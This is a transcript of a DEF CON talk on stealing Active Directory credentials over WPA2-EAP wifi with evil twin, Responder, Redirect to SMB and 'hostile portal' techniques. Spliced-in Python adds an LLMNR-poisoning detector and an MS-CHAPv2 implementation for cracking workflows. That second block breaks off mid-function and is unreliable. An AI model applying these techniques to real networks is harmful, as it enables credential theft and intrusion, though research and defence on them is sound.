So, um, my name is Gabriel Ryan. I'm a security engineer at, let's adjust this, OK. In the back, can you hear me? OK, good stuff. My name's Gabriel Ryan. I'm a security engineer at Gotham Digital Science, um, also known as Solstice. Uh, we primarily do, like, AppSec, infrastructure testing, red teaming, research, etcetera. Uh, some new things in this presentation. Uh, we're going to be talking about hostile portal attacks, that's a method of stealing Active Directory credentials from, uh, WPA2-EAP networks without network access, and we're also going to be talking about indirect wireless pivots, uh, which is a way of using rogue WPA2 attacks to bypass, uh, port-based access control mechanisms by controlling the physical layer of the network. Uh, so before we move on into that stuff, a little background info. Uh, we're going to talk about WPA2-EAP and the vulnerabilities that affect them. Um, so historically, uh, WPA2-EAP, or at least the weaker forms of it, has been susceptible to evil twin attacks, or rogue access points in general, actually. So, rogue AP attacks, uh, you could consider them the bread and butter of the modern wireless pen test. Uh, you can use them for stealthy man-in-the-middle attacks, uh, stealing RADIUS credentials, uh, all kinds of cool stuff. And the way that they work, I mean, the simplest form of rogue AP attack is the evil twin attack. The way that it works is that you have an access point, um, like the one that we see here, and then you have a bunch of clients connected to it. So let's take a look: these four clients are connected to "Def Con open" on channel 6.
Um, so if an attacker creates, um, an identical access point to this one, uh, but with a stronger signal strength, so, uh, a stronger signal strength but also has "Def Con open", channel 6, uh, what will happen is this will cause the clients to drop their associations to the, uh, to the valid access point and then connect to, uh, the rogue access point, which you see down here, and at this point the attacker has the man-in-the-middle that he or she can use, uh, to do all kinds of crazy stuff like, whoa, I almost dropped the shot glass. Um, heh heh, uh, like stealing creds and the attacks that we're going to see today. So, I mean, these are not new attacks. They've been around for a really long time. Um, you know, in fact, uh, the first mention I could find of them was in 2002, and, uh, this Wireless LAN Security FAQ by C.W. Klaus talks about evil twin attacks. Uh, fast forward a bit, you have 2003, you have asleap by Joshua Wright. 2004, we start seeing KARMA attacks; we're not really going to go into those today, but, uh, if you don't really know what they are, check them out. They're pretty cool. That was Dino Dai Zovi and Shane Macaulay. You know, in 2008 you have Josh Wright and Brad Antoniewicz, um, uh, come out with, uh, you know, attacks, you know, this is where you start to see attacks against WPA2-EAP, uh, using rogue AP attacks, and that's freeradius-wpe. 2014, uh, by that point, KARMA attacks had stopped working as well, also, so two researchers, Dominic White and Ian de Villiers, uh, came up with, uh, essentially fixed KARMA and then also added a bunch of, uh, cool techniques for attacking EAP, which, uh, we are going to talk about. And also in 2017, very, very recently, you have the guy who wrote wifiphisher, um, implemented the Lure10 attack, which you can use against, uh, Windows 10 wifi attacks. So, um, what's common, the common theme here is that, you know, rogue AP attacks have been primarily used to fill one of two roles.
Uh, stealing creds using man-in-the-middle attacks, or breaching WPA/WPA2 networks. Um, in this talk we're going to do something a little different. We're going to talk about, uh, using rogue AP attacks as a means of lateral movement. So, uh, before we continue, we should probably talk about, you know, how you can use evil twin against WPA2-EAP, and, you know, to do that we have to understand how EAP, or the Extensible Authentication Protocol, works. So logically, and for those of you who are familiar with EAP, I'm going to leave out the authenticator for now, uh, just to, um, you know, address this from a high-level perspective first, but logically, authentication in EAP, um, occurs between the supplicant and the authentication server. So the supplicant is just a fancy way of saying the wireless client, and the authentication server is the RADIUS server, and it's sitting, you know, in the background, uh, you know, deeper in the network. So the first thing that happens is the client sends an authentication request to the authentication server. At that point, the authentication server responds with an X.509 certificate, and the role of this X.509 certificate is to verify the identity of the authentication server, and if the client, you know, accepts the certificate, it's saying that it trusts the authentication server, and, you know, from that point forward, uh, we move from the outer authentication, which is what we're seeing here, to what we're seeing at the bottom of this diagram here, and that's your inner authentication. The inner authentication occurs through a secure tunnel that's established at that point. Now, the reason why we need this secure tunnel is that, you know, although it's being used as an authentication mechanism for WPA, WPA does not actually kick in until this entire process is complete.
So essentially, this is all happening over open wifi, so without that secure tunnel being established, um, this authentication process can be sniffed, and in fact legacy implementations of EAP were susceptible to this, specifically EAP-MD5. Uh, so when I said there were two components to EAP authentication, that actually wasn't entirely accurate. Um, there's a third component involved as well, and that's the authenticator. The authenticator, um, at least when we're dealing with wireless, is the access point, and the job of the access point in this case is to, um, act as an intermediary between the wireless client and the authentication server. Uh, typically there's, like, a wired connection between the access point and the authentication server, and then all the communication there is happening over layer 7, RADIUS, and then on layer 2 we have the supplicant and the, um, the EAP... and that's communication over wireless. So at this point, you know, in order for this communication to work, two things have to happen, uh, for this to be secure. You know, the client has to be able to trust the authentication server, and the client also has to be able to trust, um, uh, the access point, and, you know, as we mentioned, this is all happening over open wifi, and as we also mentioned earlier, open wifi networks are susceptible to evil twin attacks. So, likewise, this whole process, um, can actually be middled using an evil twin attack.
You know, what you do is create a rogue access point and you force the client to connect to you, and at that point you run your own RADIUS server in the background, and so long as the client accepts your forged certificate, your X.509 certificate, and by doing that is saying that it trusts you, at that point it will establish a secure tunnel with you, and then it will perform the authentication process with you, and that allows you to, uh, crack the EAP challenge response offline, uh, giving you credentials. So this attack, uh, first talked about by Brad Antoniewicz in 2008, as well as, uh, Joshua Wright, in their ShmooCon presentation, and, uh, it's been around for a while. So for the new stuff we're going to do live demos, but just for the sake of time, and also not p*****g off the demo gods, if it's just, like, review stuff I'm just going to stick to videos. Um, also just because it's Sunday, but whatever. So, you know, the first stage of the attack, uh, what's going to happen, what you're seeing here, is the attacker is actually creating a forged certificate, a self-signed certificate, and that's what's going to be sent to the client. Fast forward a bit and, you know, the attacker is starting the EAP. As you see here, uh, the EAP is enabled, and what's going to happen shortly is that you're going to get a client associating, so see, the client now is associating with the access point, and shortly thereafter you should see, right there, we have the username, challenge and response. So, at this point you have the username, challenge and response, and at this point you crack it to obtain the plaintext credentials or, um, the NT hash, which is, uh, equivalent to plaintext credentials in terms of what you can use it for. So there are two ways of doing this. The oldest way of doing it is with a dictionary attack, and the success rate of this is inversely proportional to the strength of the password.
So, say, for a really strong password, it's actually, like, a pretty bad attack. Um, you know, in 2012, um, Moxie Marlinspike and David Hulton, uh, you know, they actually, uh, did a talk at Def Con where they did a divide-and-conquer attack. So MS-CHAPv2, which is, uh, the, um, inner authentication protocol used by EAP, um, actually uses the same DES encryption as NTLMv1, so the security of this protocol is actually reducible to the strength of a single DES encryption. So, instead of, you know, um, with a dictionary attack we're trying to recover the plaintext password; with this you instead recover the NT hash, and with a, um, powerful FPGA cracking rig such as crack.sh, um, which you can go look up, it is pretty cool, um, which was previously Cloudcracker, you actually can achieve a 100 percent success rate in less than 24 hours for recovering the NT hash. So as you can see, it's pretty vulnerable, so the solution that was introduced to kind of mitigate this issue was EAP-TLS, and this was introduced in 2008, um, probably in response to, uh, the attacks that came out around the same time period, and the cool thing about EAP-TLS is that it uses mutual authentication using X.509 certificates right off the bat. So, the strength lies in the use of the client-side certificates. Uh, because, you know, with those you can't really do the evil twin attacks that we showed you in the beginning. Um, unfortunately, how many network admins are out there right now? Show of hands. Alright, so how many people out there, you know, think that putting a client cert on every device of your network is, like, a good time?
Yeah, yeah, so, I mean, this is why it never really took off, because it's, like, oh yeah, I'll just put a, uh, cert on everything, and it's actually not that simple, and, you know, it's even more difficult if you have, like, existing network infrastructure to integrate this stuff into, or if you're in, like, uh, a special scenario, like, you know, you're dealing with, you know, industrial control systems or medical equipment or something like that, uh, it might not even support client-based certificates. So, you know, you run into this classic security-versus-convenience scenario. And, you know, it's kind of, you know, network administrators are forced to choose between, uh, two really kind of, like, poor choices. You know, authentication mechanisms with known weaknesses, or you can use EAP-TLS, which is highly secure, but it's also very, um, very impractical. So what this does is it actually creates a market gap, and, you know, there are all kinds of products that have tried to address this over the years, uh, and tried to compensate for the security issues found in EAP-PEAP/EAP-TTLS but are also kind of easy to use. So the current trend that, you know, we tend to see over and over and over again, um, is the focus on breach containment rather than breach prevention. So the idea is you acknowledge that, um, yes, the wireless perimeter is weak, um, but you try to, you know, stop the threat once it gets in past that first layer of defense. So, what we're going to talk about, uh, today, is whether or not this actually works. So, um, I guess the most common way of approaching this containment problem is using, uh, a network access control mechanism, uh, to attempt to stop threats, uh, as they occur. So before that, I am going to present you with this awesome little cartoon. [silence] Yeah.
OK, so, um, so yeah, the most common way, uh, that this is implemented is to use a NAC to, um, once an attacker gets on the network, uh, you identify them as an untrusted endpoint and you quarantine them. You either, you know, completely block the port or you place them in a quarantined VLAN, and, um, you know, there are two varieties of NAC out there. There's agent-based NAC and agentless NAC. An agent-based NAC, you know, what that involves is a software component installed on every authorized endpoint of the network, and this software component is called an agent. And this agent communicates with the brain of the NAC, and, uh, that's how the brain of the NAC distinguishes, it will tell, that a particular endpoint is allowed to be there. And this is highly effective, but once again you have something you have to put on every authorized endpoint, so it's nearly as impractical as EAP-TLS. So then on the other side of the spectrum you have agentless NACs. And, uh, agentless NACs, they're purely external. Uh, they use passive fingerprinting, active scanning, and they're much easier to deploy than agent-based NACs, uh, but unfortunately they're also unable to examine the internals of the network components, so you can bypass them simply by masquerading as a valid, uh, host on the network. So once again, you know, even by using NAC we run into, uh, the same recurring dilemma, which is, you know, insecurity versus impracticality. So this creates yet another market gap, you know, where you have a high demand for a solution that offers the deep interrogation capabilities of an agent-based NAC, but without the additional overhead. So, you know, there's a third category, there are all kinds of, uh, really interesting solutions that have once again tried to bridge this gap.
Uh, and we usually refer to those as the next-generation, uh, NACs. You have, um, kind of, like, AI-based solutions that kind of, you know, establish a baseline on the network and try to look for anomalies, uh, you have, we're going to talk about one in particular just because, uh, it's a pretty good example of, uh, an interesting attempt at doing this. Uh, I tried to borrow this particular network appliance, uh, from my IT department; I opened up a help desk ticket. It's a 10,000 dollar piece of equipment, though, and, uh, yeah, I could have seen that coming, right? But interestingly enough, I also got, like, a warning from legal not to name drop these people, so we're going to refer to this as vendor A. Um, heh, but, you know, this one really interesting, uh, piece of equipment, it uses WMI to interrogate new devices. And, uh, you know, this is really cool because it's capable of performing internal checks without using an agent. Um, with that said, I mean, the way it does this is that it authenticates over SMB using a single administrative service account. The service account, you know, is given remote login privileges to all authorized devices at the group policy level, um, and this allows it to perform deep interrogations without using an agent. Pretty cool, except that it also provides a single point of failure, where you have this device that's sending god-mode hashes to every new device that's added to the network. So, you know, um, what happens here is we end up with a situation where the first potential threat here is it introduces the risk of SMB relay attacks. Um, in case you're unfamiliar, NTLM is a simple authentication protocol. Um, the way that it works is that, you know, the client first attempts to authenticate with the server. The server issues a plaintext, uh, string of characters as a challenge to the client.
The client then has to encrypt that string of characters using its password hash and then send the encrypted hash back to the server as a response. The server then decrypts it and compares it to the original string that it sent, and if it's the same, the authentication attempt succeeds. So with an SMB relay attack you literally just put yourself in the middle of that process, um, using a man-in-the-middle attack: the victim sends you the authentication request. You forward that to the target. Uh, the target then sends you the plaintext string, the challenge. You forward that to the victim and, oops, and you keep forwarding stuff back and forth, and so what ends up happening is you end up authenticating with the target instead of the victim. So, you know, once again we have this system, but, you know, we've introduced the risk of SMB relay attacks, um, because, you know, it's sending you NTLM hashes and trying to authenticate with you over NTLM. Um, but at the same time, uh, you could mitigate this potentially by using, uh, um, SMB signing, which, interestingly enough, is actually disabled by default on everything but the domain controller, um, in Windows. So, um, and the reason for this is that the domain controller, uh, downloads group policy over SMB. Um, but even if you enable SMB signing, and what you do with SMB signing is you digitally sign packets, uh, to confirm their authenticity, um, even if you enable SMB signing you still have, uh, the issue of hashes being sent directly to untrusted endpoints. So, um, interestingly enough, there is, like, uh, a piece of software that you can put on every single network endpoint, uh, that's provided by this vendor, but, uh, essentially then you're back to using an agent again, so you're kind of back to square one. So, I mean, I guess the point I'm trying to make is that, you know, no matter how much thought you put into this, there's really no magic bullet here.
I mean, you have this "security with convenience", um, uh, statement, but the problem is security with convenience is actually a paradox. So, back to wireless. Um, another technology that's often used as a wireless security mechanism that's worth looking at is client isolation. So, what client isolation is supposed to do is it's supposed to prevent wireless clients from talking to one another on the network. And, you know, a couple of use cases: on an open network, if you go onto your hotel wifi, you may notice you can't ping one another. That's because they probably have client isolation, um, enabled. And, you know, the way that, um, 802.11 is supposed to work in theory is that the AP, um, mediates all communication between the clients. So if this guy here wants to send a packet to this guy over here, the client can just stop it and say, no, you can't do that. Um, the problem is client isolation, at least on a wireless network, is a logical control; it is not a physical control. So, you know, the problem is, how do you prevent radio transceivers from communicating with one another? So a really awesome researcher, who unfortunately is no longer with us, named Cédric Blancher, uh, back in 2005, his response to this is, you can't. He released a tool called WiFitap. Uh, and this was, like, revived in 2013 by Oliver Lavery of Gotham Digital Science, way before my time. Um, but the way that WiFitap works is that it reads packets from the victim to the AP using a wifi interface in monitor mode. And then, you know, every time it receives one of those packets that's going out to the distribution system, it injects a response as if it's coming from the AP. So this allows it to actually, um, communicate with the, um, with the various resources on the network without actually being associated with the network at all.
And it provides a neat little TUN/TAP device that you can use to bridge over to the, uh, to the monitor mode interface that does this. So, I mean, there are some later tools that let you do even more stuff. The aircrack suite has airtun-ng, which you can do this with WEP. And there's also tkiptun-ng, which you can do this with WPA1. Um, there's also this, uh, theoretical attack that has been talked about, called Hole 196, where, uh, I guess the idea is that you might be able to do this with WPA2. It's really, really, really debatable whether this actually works. I've never seen it pulled off before. Uh, but it's worth mentioning just to be thorough. So, uh, here's an example of WiFitap doing its thing. In the top right we have, uh, we're going to create a valid, open access point, and then we're going to connect to this open access point from our host operating system. This terminal has just been changed into a VM, by the way. And then we're going to start sending, uh, ICMP packets, uh, to this AP, and what you're going to notice is we're going to have 5 ICMP packets sent and there are going to be 5 responses. So now what we're going to do is, in this terminal to the left, we're going to start wifiping, and wifiping is a modified version of WiFitap that, um, essentially all it does is that every time it sees an ICMP packet, and sniffs one, it injects a response to that ICMP packet in the form of an ICMP reply. So we're going to run that as well and repeat what we did in the last process, uh, sending 5 ICMP packets, and notice now, instead of receiving 5 ICMP replies, we receive 10 of them. And we also get little warnings that we're receiving duplicates. So, what we've just done is we sent packets to, um, uh, a network endpoint without actually being associated with that network. So, you know, food for thought, you know, going back to the whole issue of NAC, right?
You know, what if we're missing the point? You know, what we have been talking about up to this point is whether or not, you know, NACs are capable of stopping a direct attack. But, you know, when we're talking about wireless, NAC isn't the only problem. Um, you know, the role of NAC is to prevent attackers from accessing sensitive resources after the breach has occurred. Um, you know, and they do this by, when an unauthorized endpoint has been detected, uh, they take one of two actions. Either the endpoint is placed in quarantine or the port is blocked. But, you know, violating access control policies, uh, what this does is it causes the NAC to impose a restriction, and in a wired network this is a physical restriction, but in a wireless network this can only be a logical restriction. More on this later. So, I want you to think of a scenario that's pretty common if you're doing pen testing or anything that's kind of infrastructure testing. So, um, you know, we've already breached the perimeter using the attack that we described in the first section of this talk. And this is also where, over on the left, we've been quarantined, and we want to get over here. We want to pivot further into the network where we can actually do some damage. Uh, unfortunately we've been quarantined by this NAC here, but fortunately for us there's this victim over here that we can potentially do something with. And it's also a wireless client. So, more on that later. Uh, but the question is, how do we get out of this situation? So, I mean, to understand this, um, we need to look at something called LLMNR/NBT-NS poisoning. Um, and LLMNR/NBT-NS poisoning, it basically takes advantage of a flaw that exists within NetBIOS name resolution.
Um, so the way NetBIOS resolution works is that, uh, the first thing that will happen is that a Windows host, when it is trying to resolve a NetBIOS name, it will check internally its local cache and also its LMHOSTS file. If that fails, um, it will then attempt DNS resolution using local nameservers. Uh, and then at that point, um, if that fails as well, it will fall back to LLMNR and then NBT-NS, uh, and send broadcast requests to the entire subnet. So, uh, LLMNR/NBT-NS, they're actually different mechanisms, but they serve the same logical functionality. And this is best understood through example. Let's say we have two computers named Alice and Leeroy. Alice wants to request a file from Leeroy but doesn't know Leeroy's IP; all Alice knows is Leeroy's NetBIOS name. So Alice will attempt to resolve Leeroy's name locally and also using local DNS, but let's say this attempt fails. Alice will then make a broadcast request using LLMNR/NBT-NS. At this point every single computer on Alice's subnet will receive this request, and the idea here is that only Leeroy should respond to this, but this is based on the honor system. Does anyone see a problem with this yet? Yeah, yeah, so, I mean, it's a lot like ARP, where, you know, there is no honor among thieves. If Alice receives two of these responses, only the first one is going to be considered valid, and this is going to create a race condition. The attacker can simply wait for LLMNR/NBT-NS queries and respond to all of them. And this will cause, um, the victims of this attack to send their traffic to the attacker. So there's, uh, I guess, like, the most popular tool for doing this, and really the pioneer in doing this, was, um, uh, Responder by Laurent Gaffié. And we're going to start this up on the left and we're going to run this.
Uh, you can see here that we're poisoning LLMNR/NBT-NS, and we also have auth servers that are waiting for when this thing tries to connect to us and authenticate. So we're running Responder, and then over here on the right we have a victim computer, uh, named Jenkins. We attacked Leeroy earlier. Um, heh. So, Jenkins is going to try to connect to, um, he's going to try to connect to a non-existent, uh, file server. And the reason why we're using a hostname that is invalid is because it will force Jenkins to fall back to LLMNR/NBT-NS, because it obviously won't be resolvable using the first three methods. And then when this happens, um, the Responder tool running on the left is going to send poisoned answers to Jenkins. And, oh, we have the user's hash right there. So we're about, uh, 5 percent, you know, finished with our escape attempt. Um, I'm just going to check the time really fast. OK, we're doing great. Awesome. So, um, the next thing we need to go over in order to understand how we can get out of this is something called Redirect to SMB. Now, the idea behind Redirect to SMB is that you force the victim to visit an HTTP endpoint that redirects to an SMB share on the attacker's machine, so you send them a URL. They click the URL and this takes them to a specially configured HTTP server, and the only thing that the HTTP server does is one thing and one thing only: it redirects all HTTP requests to a rogue SMB server that's sitting there, um, waiting to accept, um, uh, NTLM authentication. And what this does is it causes the victim's browser to attempt NTLM authentication with the attacker. Uh, there's a variation of this, uh, you know, where you simply redirect to a non-existent SMB share and this triggers LLMNR/NBT-NS. But it's a really fast way to get hashes. It does require social engineering, though, for some way of getting access to that server. So, um, now is where we get into new stuff.
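The LLMNR/NBT-NS race condition the speaker describes, seen from the detection side: an added example, not code from the talk or its tools. It flags the two symptoms a defender can observe in name-resolution traffic (one host claiming many unrelated names, and more than one host answering the same query); the NameEvent record shape and the SAMPLE traffic are constructed for illustration.

```python
"""LLMNR/NBT-NS poisoning detection over constructed name-resolution events.

Added example, not part of the talk. A legitimate host answers only for its
own name; a poisoner answers every broadcast query it sees, so it ends up
"owning" many unrelated names and racing the real owner for the rest.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class NameEvent:
    """Hypothetical sensor record for one LLMNR or NBT-NS packet."""
    kind: str   # "query" or "answer"
    proto: str  # "LLMNR" or "NBT-NS"
    name: str   # name being resolved (compared case-insensitively)
    src: str    # IP of the host that sent the packet
    dst: str    # IP of the recipient (multicast/broadcast for queries)


# Constructed sample traffic: Alice (10.0.0.10) and Jenkins (10.0.0.30) query;
# Leeroy (10.0.0.20) answers for its own name only; 10.0.0.66 answers everything.
SAMPLE = [
    NameEvent("query", "LLMNR", "LEEROY", "10.0.0.10", "224.0.0.252"),
    NameEvent("answer", "LLMNR", "LEEROY", "10.0.0.20", "10.0.0.10"),
    NameEvent("answer", "LLMNR", "LEEROY", "10.0.0.66", "10.0.0.10"),
    NameEvent("query", "NBT-NS", "FILESRV01", "10.0.0.30", "10.0.0.255"),
    NameEvent("answer", "NBT-NS", "FILESRV01", "10.0.0.66", "10.0.0.30"),
    NameEvent("query", "LLMNR", "wpad", "10.0.0.30", "224.0.0.252"),
    NameEvent("answer", "LLMNR", "WPAD", "10.0.0.66", "10.0.0.30"),
    NameEvent("query", "NBT-NS", "PRNT-OLD", "10.0.0.10", "10.0.0.255"),
    NameEvent("answer", "NBT-NS", "PRNT-OLD", "10.0.0.66", "10.0.0.10"),
]


def names_claimed(events):
    """Map each answering host to the set of distinct names it claimed."""
    claims = defaultdict(set)
    for e in events:
        if e.kind == "answer":
            claims[e.src].add(e.name.upper())
    return dict(claims)


def contested_names(events):
    """Names answered by more than one host: the race where only the
    first answer is honoured, so the victim may accept the wrong one."""
    responders = defaultdict(set)
    for e in events:
        if e.kind == "answer":
            responders[e.name.upper()].add(e.src)
    return {n: sorted(h) for n, h in responders.items() if len(h) > 1}


def suspected_poisoners(events, threshold=3):
    """Hosts claiming at least `threshold` distinct names. No legitimate
    host should own several unrelated names on one subnet."""
    return sorted(h for h, n in names_claimed(events).items() if len(n) >= threshold)


def report(events, threshold=3):
    """One line per finding, suitable for an alert or a log."""
    lines = []
    claims = names_claimed(events)
    for host in suspected_poisoners(events, threshold):
        lines.append(f"suspected poisoner {host} claimed: {', '.join(sorted(claims[host]))}")
    for name, hosts in sorted(contested_names(events).items()):
        lines.append(f"contested name {name}: answered by {', '.join(hosts)}")
    return lines


if __name__ == "__main__":
    for line in report(SAMPLE):
        print(line)
```

Disabling LLMNR and NetBIOS over TCP/IP on endpoints removes the broadcast fallback this detection watches for, which is the usual mitigation.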
And it looks like we have lots of time to go over it too, so. The demo gods will probably be somewhat happy about this. Um, so, now we're going to talk about hostile portal attacks. So the hostile portal attack, it's a way of stealing Active Directory credentials from a wireless network without direct network access. And the way that you do this is you essentially make a modified captive portal. So a captive portal... How many of you have seen something like this recently? Yeah, so if you're staying at a hotel, you run into this captive portal, and the idea here is that you restrict wifi access by, um, forcing the users to visit this page first, and, you know, at that point you can do anything you want; it's most commonly used to, uh, either prompt them to authenticate or provide credit card information or something like that. So the way this works is that, um, all DNS queries are resolved to the captive portal. You know, and this usually specializes in HTTP, but also, in case they are manually setting their DNS server, uh, you can also redirect DNS traffic to your own DNS servers so that they're forced to use yours. And then, if you really want to be nasty, you just redirect HTTP traffic to your, uh, captive portal as well, so that even if they're not using DNS, um, at all, uh, you still have them trapped. Uh, so what a hostile portal attack is, is that you kind of modify this so that it performs a Redirect to SMB attack. Uh, the victim's forced to connect to the attacker using the rogue AP attack. Kinda like that, right? And the next thing that happens is that, instead of redirecting everything to a captive portal, you perform a Redirect to SMB, and what happens is that the victim is then forced to, um, if they're using HTTP traffic at all, they will be forced to authenticate with the attacker, and that gives you NTLM creds.
So, um, and in the background, also, to make this more effective, uh, we can run Responder to poison LLMNR/NBT-NS, uh, requests, so that even if they're just kind of idle we can still get them that way. So now we're going to do a live demo. So, I am going to, I have to switch screens here. Alright, so in the bottom left here we're going to create, um... We're going to do this on the open access point first, because there are another couple of steps we have to do to get this to work with a, um, not-so-open access point, uh, a WPA2-EAP access point. Well, it's not on the screen. Uh, oh. Alright, do you see one thing now? Alright, I'm just going to... It's still not on the screen. Oh, whatever. OK. I'm going to just use the video then. Uh, cause, just one second, oh. I have 35 minutes. Here, check this out. Isn't that fun. Uh, do I have a command but... this is a Mac so I'm not sure. Alright, can you see stuff now? Alright, cool. Nothing like System Preferences to the rescue. Thanks, Steve Jobs. Um, so if your Mac breaks you just pray to Steve Jobs and then everything works again. Except now my stuff's on two different desktops because I tried to fix it that way. Alright. That's the first desktop. And I'm going to put a 2 minute curfew on this demo, or a 1 minute curfew on this demo, should I say? Aaah, I'll go 2, and if I encounter 2 minutes' worth of problems, just so we can squeeze everything in, I'm going to just move on. But hopefully, the way things are going... Uh, you know, knock on wood. [tap, tap] OK, this should work. Alright, so the first thing I'm going to do is I'm going to create a... so these are backwards... that moves here... OK, so we've created the open access point. This is not looking like an open access point. Alright, so we've tried to create an open access point. Now we're, uh, we're killing the... uh... OK. Alright, here we go.
So we're going to create an open access point, uh, using eaphammer; we're actually going to use the same attack tool that we used for, um, attacking this thing to create our valid access point. Uh, cause why not. Now we're going to have Leeroy up here in the top left. Um, can you guys see this? OK, good stuff. And OK, it looks like we're already connected. Excellent. Uh, we're now going to create our rogue access point over here. Uh, and we're going to launch this attack, and then we're going to get ready to deauthenticate, uh, Leeroy to get it to roam from one BSSID to another, which will make this attack effective with all these network interfaces really close together. So we're doing this. And OK, so we got it to associate. And notice that when we open up IE, OK, now we have hashes. Now to get everything... Now to get everything to stop. OK. There we go. Cool stuff. So that's a hostile portal attack against an open network. It's so impressive we're going to make it a little more impressive. We're going to use it against WPA2 in a second. Once I clear this, uh, previous hash that we just captured, so we get it twice... Alright... Oh, really, OK. I feel like we've been here before for some reason... OK... Magic. OK, so, uh, OK, so now let's talk about how to do this with WPA-EAP networks. So in most cases, uh, WPA-EAP means EAP-TTLS or EAP-PEAP. Both of these use MS-CHAPv2 as the inner authentication protocol. The interesting thing about MS-CHAPv2 is it uses mutual authentication, which means at the very end of the authentication, uh, process the RADIUS server must actually prove knowledge of, uh, the user's password to the client, uh, for the entire authentication process to succeed. So what this means is that although the attacker can force the victim to authenticate with an evil twin, uh, to steal the hashes, uh, the RADIUS server will still fail the final stage of the authentication process and the client will not associate with the attacker.
So the way that you get around this, because you do need to get around it: in order to do the hostile portal attack you need to get the client to completely associate with you. There are a couple of options. For weak RADIUS passwords you can use a technique that Dom White and Ian de Villiers came out with at DEF CON 22 called Auto Crack ’n Add, and we’ll talk about that in a second. The second solution is simply to crack offline and finish the attack later. So at the very end of the MS-CHAPv2 authentication process, the big thing here is that the client is going to send the challenge response, which is part of what we’re cracking offline to obtain the credentials, to the RADIUS server, which in this case, with the tools that we’re using for the attack, is hostapd. At that point hostapd is going to load the password from this file called the EAP user file, which is a special text file that it uses as a database containing that information. So at that point the attacker, or the RADIUS server in this case, is going to attempt to construct an authentication response that proves knowledge of the user’s password, and that will be sent with the auth success message back to the victim. So when you’re using the Auto Crack ’n Add technique, instead of immediately loading that password from the EAP user file, you instead take the challenge response and send it to a cracking rig. This can be a remote cracking rig that is very powerful; it doesn’t have to be something that is on your laptop. You send that off, and the idea is that hopefully you will get the results back in time to append them to that user file in real time and then use that to construct the authentication response.
This may not work the first time, but the idea is that in a few seconds or even a few minutes, when the victim tries to reassociate, this will work and the full association will happen. And the second option, of course, for all those other passwords, is simply to crack offline and finish it later. Without even going into the discussion that advanced persistent threats like this guy on the right are really limited by time boxing, remember that we talked about how the divide and conquer technique, with sufficiently powerful hardware, can crack MS-CHAPv2 within 24 hours with a 100 percent success rate. So you can just go with that: do the cracking and then come back the next day and finish it. For demo purposes, I’m obviously not going to connect to the DEF CON wifi and send stuff over there, so we’re going to go with the first option. Alright, so here we are. This is very similar... Can you guys see the... OK yeah, I can see that, so that’s working. So we’re going to first create a PEAP access point this time, using WPA2-PEAP, and this wireless client here, Leeroy, is going to attempt to connect to it. And it did. OK. So we have a connection. Now we’re going to start our rogue... Actually, before I do that, I’m going to go in here, because I did this earlier to practice and the credentials are already there, so I’m going to get rid of them. OK. Now we’re going to do a local autocrack, so we’re just going to do this internally. And finally, to get this thing to roam, we deauth as before. Hopefully this works. Uh oh. Alright, so what are we running here? No?! OK, it emptied off into the wrong thing. That would be bad. What... no, it’s still connected to that, so OK. Authenticated. I’m actually just going to copy
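The mutual-authentication step described above, worked through in code as an added example (this is not code from the talk or from eaphammer/hostapd). It implements the server-side pieces of RFC 2759: the NT password hash, the 8-byte ChallengeHash that john/hashcat take as the "challenge", and the password-dependent Authenticator Response that the Success packet must carry. A rogue RADIUS server can only compute that last value once the captured challenge/response has been cracked, which is exactly the gap Auto Crack ’n Add closes. The inputs are the public RFC 2759 section 9.2 test vector, not a captured credential; the "cracked" password is simply assumed to have come back from the rig, and the hostapd eap_user phase-2 line format is taken from the hostapd.eap_user example file. MD4 is implemented locally because hashlib's md4 is disabled in many OpenSSL 3 builds.

```python
"""Server side of MS-CHAPv2 mutual authentication (RFC 2759) plus Auto Crack 'n Add bookkeeping.

Added example, not code from the talk or from eaphammer/hostapd. authenticator_response()
is what a rogue RADIUS server cannot produce until the captured challenge/response is cracked;
jtr_netntlm_line() builds the line shipped to the cracking rig and eap_user_entry() the hostapd
eap_user phase-2 line appended once the password comes back.
"""
import hashlib
import struct

_MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, needed for the NT hash (MD4 over the UTF-16LE password)."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & _MASK
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (function, additive constant, shift amounts, word order) per round
        (f, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack_from("<16I", msg, off)
        a, b, c, d = state
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                # Each step updates one word; rotating the tuple reproduces the ABCD/DABC/CDAB/BCDA order.
                a, b, c, d = d, rotl((a + fn(b, c, d) + x[idx] + k) & _MASK, shifts[i % 4]), b, c
        state = [(s + v) & _MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_password_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def challenge_hash(peer_challenge: bytes, authenticator_challenge: bytes, username: str) -> bytes:
    """RFC 2759 8.2: the 8-byte value the client's DES step actually uses, and what john/hashcat expect."""
    return hashlib.sha1(peer_challenge + authenticator_challenge + username.encode()).digest()[:8]


MAGIC1 = b"Magic server to client signing constant"
MAGIC2 = b"Pad to make it do more than one iteration"


def authenticator_response(password: str, nt_response: bytes, peer_challenge: bytes,
                           authenticator_challenge: bytes, username: str) -> str:
    """RFC 2759 8.7: the 'S=...' string the server must put in the Success packet (needs the password)."""
    password_hash_hash = md4(nt_password_hash(password))
    digest = hashlib.sha1(password_hash_hash + nt_response + MAGIC1).digest()
    chal = challenge_hash(peer_challenge, authenticator_challenge, username)
    return "S=" + hashlib.sha1(digest + chal + MAGIC2).digest().hex().upper()


def jtr_netntlm_line(username: str, peer_challenge: bytes, authenticator_challenge: bytes,
                     nt_response: bytes) -> str:
    """Line handed to the cracking rig (john --format=netntlm)."""
    chal = challenge_hash(peer_challenge, authenticator_challenge, username)
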